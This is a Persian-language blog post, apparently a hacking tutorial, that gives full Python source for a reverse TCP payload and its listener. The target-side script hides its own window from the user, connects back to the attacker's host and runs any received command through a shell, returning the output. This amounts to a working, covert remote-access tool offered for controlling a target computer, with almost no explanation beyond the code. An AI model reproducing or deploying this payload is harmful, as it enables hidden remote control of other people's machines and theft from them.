-
شنبه, ۴ ارديبهشت ۱۴۰۰، ۰۹:۴۴ ب.ظ
-
۱۶۱۷
طراحی پیلود Reverse TCP در پایتون و کنترل سیستم هدف از طریق آن
درود به همه !
اگه یادتون باشه قبلا پستی به نام ( ساخت پیلود شخصی برای کنترل کامپیوتر شخصی در پایتون ) منتشر کرده بودیم که در این پست اومدیم یک پیلود بسیار ساده طراحی کردیم و با استفاده از اون میتونستیم دستورات دلخواهمون رو روی کامپیوتر هدفمون اجرا کنیم . ولی این پیلود مشکلات زیادی داشت و کاملا مبتدی بود . امروز تصمیم گرفتیم از صفر شروع کنیم و یک پیلود Reverse TCP خیلی قوی تر از پیلود قبلی بنویسیم با قابلیت هایی مثل مخفی کردن خودش از دید کاربر و ... و با استفاده از اون دستورات دلخواهمون رو روی سیستم هدفمون اجرا کنیم و کنترلش کنیم .
ویدیو آموزش :
سورس شنودگر (سیستم هکر):
# hacker
import socket
sock = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
sock.bind(("192.168.1.103",12345))
sock.listen()
c, addr = sock.accept() c.settimeout(3) while True: command = input("target >> ") if command == "exit": c.send(b"exit") sock.close() break c.send(command.encode())
try: result = c.recv(1024) print(result.decode()) except: pass
سورس payload (سیستم هدف):
# target
import socket import subprocess
from win32con import SW_HIDE import win32gui
def hidden(): pid = win32gui.GetForegroundWindow() win32gui.ShowWindow(pid , SW_HIDE)
hidden()
sock = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
sock.connect(("192.168.1.103" , 12345))
while True: command = sock.recv(1024) if command == b"exit": sock.close() break proc = subprocess.Popen(command.decode() , shell=True , stdout=subprocess.PIPE, stderr = subprocess.PIPE)
result = proc.stdout.read() + proc.stderr.read()
sock.send(result)
امیدوارم لذت ببرید .
سوالی بود مطرح کنید
یا حق !
Telegram Channel : @mrpythonblog